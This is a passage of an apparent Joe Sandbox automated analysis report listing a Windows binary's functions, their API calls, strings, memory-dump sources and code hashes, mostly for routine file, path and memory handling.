Opcode Fuzzy Hash: ba0e9ec32f9d425c922e86707f850c9359ff9466c7c00b2dd6f3e6a55f5680d3
Instruction Fuzzy Hash: 42218E22E08651A9EB14AA92A400279A350EB44FF0FB80B31DE7D47BD1DEFCE451A354

Function 00007FF731C72C54 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C72D77

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 35ac2f166feaefe62d92b72ca549baefce0208cc5dcb1b0d16f229ca39a288f7
Instruction ID: 5b6017dc100c64b7fafe37da1cc26e6d518833a15e96985b081c45c2cf2edf4a
Opcode Fuzzy Hash: 35ac2f166feaefe62d92b72ca549baefce0208cc5dcb1b0d16f229ca39a288f7
Instruction Fuzzy Hash: 4A214922F1458276EB09FB60D5483F9A324FB59784FE44431E71D07AA2DFBCA4A5E321

Function 00007FF731CB11CC Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CB1200

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
Instruction ID: 69b6bb6973fde0074e86e8edabdf8632fbe5f6e7eed5b30fab25c6d7f25d4f56
Opcode Fuzzy Hash: 1ba0ab62ba35dd53ebd3373b140bbd3b037d016492b4c350d3702476c2c82e75
Instruction Fuzzy Hash: 73117C62D0D682A6E710EF51B440139F3A4FB40780FE44534EA8EC7696DFBCE800A721

Function 00007FF731C73AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C73B6C

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 3adf43a935cc40b1011b909937d1f58e6063e9716f7a31a2f6da0ebc7781c1ad
Instruction ID: 1ff28c3389b54b331cfac0371136c08a617867ca8341f32ede6bcf0f7d21df1b
Opcode Fuzzy Hash: 3adf43a935cc40b1011b909937d1f58e6063e9716f7a31a2f6da0ebc7781c1ad
Instruction Fuzzy Hash: 35010462E1878195FB11AB28E445279B361FB88BA0FE06231E69C07AA5DFACD041D714

Function 00007FF731CA14D8 Relevance: 1.5, APIs: 1, Instructions: 38COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF731CA1584: GetModuleHandleW.KERNEL32(?,?,?,00007FF731CA14F3,?,?,?,00007FF731CA18AA), ref: 00007FF731CA15AB

DloadProtectSection.DELAYIMP ref: 00007FF731CA1549

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
Instruction ID: a66afebdae9063f59040287c728f578218b5095e2aafcabd684898c29126331e
Opcode Fuzzy Hash: 799d038b7158803bea933cf39b0b77b6ad7abc565185a6302c43ebec12009330
Instruction Fuzzy Hash: EA11CC62D08507A1FB52BB19E8453B0A350BF04348FF80938C94D862B5EFBCA495B730

Function 00007FF731C83E88 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C8407C: FindFirstFileW.KERNELBASE ref: 00007FF731C840CB
Part of subcall function 00007FF731C8407C: FindFirstFileW.KERNEL32 ref: 00007FF731C8411E
Part of subcall function 00007FF731C8407C: GetLastError.KERNEL32 ref: 00007FF731C8416F

FindClose.KERNELBASE(?,?,00000000,00007FF731C90791), ref: 00007FF731C83EBD

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
Instruction ID: dd40485aa446cfb63e31cf9bdf689a60e9945424e514d4d694730bbeb54f8285
Opcode Fuzzy Hash: 3db1f706a341b632f8dfa3ea15531839b7ab568833e068a27522bd2dc9fc7792
Instruction Fuzzy Hash: 3EF02862D0C24196DB50BB74A08027967609F0ABF4F742334DA3D077C7CE69D485D720

Function 00007FF731C826FC Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF731C82715

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
Instruction ID: cc96ad5c3ea95f68220c23e9ce8ad654be2d6b428a9f922dae29097363d36d51
Opcode Fuzzy Hash: fdea881a5ac41bc8476d4f771acb1fa358bbe6d5cd898be5f50fef914b09b9a2
Instruction Fuzzy Hash: C9E08C12E2055582FB20BB6BD8896689320AF8CB84BD85031CE0C47721CF38C485C610

Function 00007FF731C82450 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF731C82462

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
Instruction ID: 603ce3c4a993dcd41943d5ae438cc7d2b52914ffd4c571033818a49849ebb371
Opcode Fuzzy Hash: 03da3826baee9e3889fc773b2886221d394f3e810eac95c36ba5225e1f499163
Instruction Fuzzy Hash: E0D0C916D09441A2EE10A639E89503C5360AF96735FF40721D67E81AE1CA5D9496A630

Function 00007FF731CAF984 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF731CAF9D9

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
Instruction ID: b27f50488e376f937c9f0b6adb99ee4b54f46b9dec2abdd4704f8622235c18f7
Opcode Fuzzy Hash: 65d65be094b720022a4c613e05cd8daa3805a7558d9a012189656855d83645cd
Instruction Fuzzy Hash: 42F04965F1964771FF567A7299213BCD3946F94B80FA84C31C90E86281EEBCA881A230

Function 00007FF731CAD8CC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF731CAD90A

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
Instruction ID: 06311209b55f3662e03b2ccce384b28b4186ef8abbe7b3cc5b1498c7686ce659
Opcode Fuzzy Hash: 2826fc88380e59435e692d83d50ce6089ce9b14572d7d031222529168f4ecb4e
Instruction Fuzzy Hash: 40F0FE15F09287A5FF5677715C212B5D3915F54760FA94E30E92E862C1DDACE880A630

Function 00007FF731C82090 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000001,00007FF731C82036), ref: 00007FF731C820B6

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
Instruction ID: d862967ace5450ebe9509220a4f1569b89a405ccba6ec9d2dbaaf5f7cf0f1b41
Opcode Fuzzy Hash: 88ac200104c8a376347706866ba6eb900ce7ebb2d802d1386c93ce6497709a49
Instruction Fuzzy Hash: 88F0C832E08642A9FB24AB30E484379A761EB18B78FA94335D73C015D4CFA8D896D320

Non-executed Functions

Function 00007FF731C7C300 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF731C7DE14: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF731C7CF5B), ref: 00007FF731C7DE37
Part of subcall function 00007FF731C7DE14: GetLastError.KERNEL32 ref: 00007FF731C7DE98
Part of subcall function 00007FF731C7DE14: CloseHandle.KERNEL32 ref: 00007FF731C7DEAB

wcscpy.LIBCMT ref: 00007FF731C7CBD8
wcscpy.LIBCMT ref: 00007FF731C7CC0E
CreateFileW.KERNEL32 ref: 00007FF731C7CC48
DeviceIoControl.KERNEL32 ref: 00007FF731C7CD11
CloseHandle.KERNEL32 ref: 00007FF731C7CD22
GetLastError.KERNEL32 ref: 00007FF731C7CD3E
RemoveDirectoryW.KERNEL32 ref: 00007FF731C7CD8D
DeleteFileW.KERNEL32 ref: 00007FF731C7CD98
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CE99
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CE9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEAB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEB1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEBD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEC3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEC9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CECF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CED5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEDB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C7CEE7

Strings

SeRestorePrivilege, xrefs: 00007FF731C7C353
UNC\, xrefs: 00007FF731C7C54F, 00007FF731C7C56D
\??\, xrefs: 00007FF731C7C3A2, 00007FF731C7C3C8
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF731C7C35F

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2659423929-3508440684
Opcode ID: 035eeedd3e3c2ec45d20f61d654678d5710c61cc22f79d0aa5ad14446b6256e8
Instruction ID: 700c0803da9bea5ae972f340d9a6343fd82ea14a0a2b08363b54369909f5466a
Opcode Fuzzy Hash: 035eeedd3e3c2ec45d20f61d654678d5710c61cc22f79d0aa5ad14446b6256e8
Instruction Fuzzy Hash: D862D162F08783A9FB00EB74D4852BDA361FB457A4FA04231DA2C57AD9DFB8E581D314

Function 00007FF731C8F100 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON

Download Yara Rule

APIs

_Init_thread_footer.LIBCMT ref: 00007FF731C904A8

Part of subcall function 00007FF731C9B05C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00007FF731C903A9), ref: 00007FF731C9B090
Part of subcall function 00007FF731C9B05C: SetLastError.KERNEL32 ref: 00007FF731C9B0D3

Part of subcall function 00007FF731C7129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C71396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90410
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90416
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9041C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90422
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90428
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9042E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90434
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9043A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90440
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90446
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9044C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90452
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90458
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9045E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90464
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C9046A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90470
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C90476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C904B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C904B8

Strings

%s: %s, xrefs: 00007FF731C8FB91
%ls, xrefs: 00007FF731C8F32C, 00007FF731C8F37F

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$Concurrency::cancel_current_taskInit_thread_footer
String ID: %ls$%s: %s
API String ID: 3233655583-2259941744
Opcode ID: cc1c4c34171a6bb235fdcb5b80e9a2c079f2ebd0ebebc9d1ba56227bb0478327
Instruction ID: 3ec03380a81176a47914137c976a927d8d9edcdf619a7a3ef8bb5f7d3f6be1ae
Opcode Fuzzy Hash: cc1c4c34171a6bb235fdcb5b80e9a2c079f2ebd0ebebc9d1ba56227bb0478327
Instruction Fuzzy Hash: 4AB2CB62E1878262EB10BB25D4842BEE351FFC5790FA05336E79D53AD6EEACE140D710

Function 00007FF731CB24D0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF731CB2B92
memcpy_s.LIBCMT ref: 00007FF731CB353F
memcpy_s.LIBCMT ref: 00007FF731CB35E6

Part of subcall function 00007FF731CB383C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF731CB386E

memcpy_s.LIBCMT ref: 00007FF731CB36AF

Part of subcall function 00007FF731CACF88: _invalid_parameter_noinfo.LIBCMT ref: 00007FF731CACFAD

Strings

1#SNAN, xrefs: 00007FF731CB3749
1#IND, xrefs: 00007FF731CB372A
1#INF, xrefs: 00007FF731CB3787
1#QNAN, xrefs: 00007FF731CB3768

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 1759834784-2761157908
Opcode ID: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
Instruction ID: 423ca97d91baa6945df7f14addbf5bb218ab5881398b6427dd6d3e730dc0d50b
Opcode Fuzzy Hash: f4511a10a764153de8bd46bbc9a62ab6f98d2375fe8a04f030b037aba6a1eadf
Instruction Fuzzy Hash: 97B25C72E081829BE725DE69D4407FDB7A1FB48388FA09135DA0A97B84CFBCE504DB50

Function 00007FF731C81A00 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF731C81A4F
GetLongPathNameW.KERNEL32 ref: 00007FF731C81A98
GetShortPathNameW.KERNEL32 ref: 00007FF731C81AD9
GetShortPathNameW.KERNEL32 ref: 00007FF731C81B22

Part of subcall function 00007FF731C91344: CompareStringW.KERNEL32 ref: 00007FF731C91363

MoveFileW.KERNEL32 ref: 00007FF731C81DB6
MoveFileW.KERNEL32 ref: 00007FF731C81E1D

Part of subcall function 00007FF731C820F4: CreateFileW.KERNEL32 ref: 00007FF731C821FC

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81F99
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81F9F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C81FA5

Strings

rtmp, xrefs: 00007FF731C81CAC, 00007FF731C81CBB

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd

Similarity

API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
String ID: rtmp
API String ID: 3587137053-870060881
Opcode ID: c19f8ddd3c56ddd6c1a988766fc40abef8126931994928a496f1049b320f1b0a
Instruction ID: 80d32b900868e52141b9d02f99f0ad0000b40258a180987822e1be7d81a07c61
Opcode Fuzzy Hash: c19f8ddd3c56ddd6c1a988766fc40abef8126931994928a496f1049b320f1b0a
Instruction Fuzzy Hash: CFF1E622F08A42A9EB10EB65D4801FDA7A1FB957C4FA01132EA4D43EA9DFBCD585D710

Function 00007FF731C85B20 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF731C85B82
GetFullPathNameW.KERNEL32 ref: 00007FF731C85BCE
GetFullPathNameW.KERNEL32 ref: 00007FF731C85CEB
GetFullPathNameW.KERNEL32 ref: 00007FF731C85D30
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C85EA0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C85EA6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C85EAC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C85EB2

Memory Dump Source

Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true

